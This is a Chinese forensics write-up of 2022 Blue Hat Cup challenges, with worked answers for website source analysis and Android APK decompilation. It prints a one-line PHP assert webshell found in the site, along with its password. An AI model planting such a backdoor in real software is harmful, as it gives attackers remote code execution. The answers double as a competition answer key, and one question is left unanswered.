前言

练练取证

[蓝帽杯 2022 初赛]网站取证_1

据了解，某网上商城系一团伙日常资金往来用，从2022年4月1日起使用虚拟币GG币进行交易，现已获得该网站的源代码以及部分数据库备份文件，请您对以下问题进行分析解答。
请从网站源码中找出木马文件，并提交木马连接的密码。

D盾扫描即可

发现assert后门

<?php assert(@$_POST['lanmaobei666']); ?>

要求提交木马连接的密码

即lanmaobei666

[蓝帽杯 2022 初赛]网站取证_2

请提交数据库连接的明文密码

全局找sql相关的文件

在database.php中找到password

f12转到定义

在PHP5环境下把return改成echo，然后执行这个方法可以得到密文KBLT123

[蓝帽杯 2022 初赛]网站取证_3

请提交数据库金额加密混淆使用的盐值。

[蓝帽杯 2022 初赛]程序分析_1

apk取证参考文章

现已获取某个APP程序，请您对以下问题进行分析解答。
本程序包名是？（答案参考格式：abc.xx.de）

jadx反编译apk包

反编译APK，在AndroidManifest.xml文件中，查看manifest节点下的package属性即可获取APK包名

AndroidManifest

AndroidManifest.xml文件是配置清单文件，也是编译过的文件，用来描述应用程序的清单信息。包括包名、应用名、权限、安卓四大组件、版本等重要信息都在这里面声名。

当打包应用程序时，AndroidManifest.xml 文件会自动生成，并且会被打包进 APK 文件中。当你安装应用程序时，Android 系统会读取这个文件，以确定应用程序的基本信息和权限要求。

开发者可以在 AndroidManifest.xml 文件中声明应用程序使用的权限，例如访问网络、访问文件、访问相机等。在应用程序安装时，用户会看到这些权限的描述信息，然后决定是否允许应用程序使用这些权限。

[蓝帽杯 2022 初赛]程序分析_2

本程序的入口是？

查找android.intent.action.MAIN和android.intent.category.LAUNCHER对应的activity，该activity对应的android:name属性既是入口activity名称

android.intent.action.MAIN决定应用程序最先启动的Activity

android.intent.category.LAUNCHER决定应用程序是否显示在程序列表里

[蓝帽杯 2022 初赛]程序分析_3

本程序的服务器地址的密文是？

上一题我们知道入口是minmtta.hemjcbm.ahibyws.MainActivity

跟踪过去

发现一个像是密文的base64字符串

解码发现确实是服务器地址

[蓝帽杯 2022 初赛]程序分析_4

本程序实现安全检测的类的名称是？

在MainActivity文件中发现引入了d.a.a.h模块

跟踪过去

找到安全检测相关的字符串

则对应的类是d.a.a.c.a.a()，即名称为a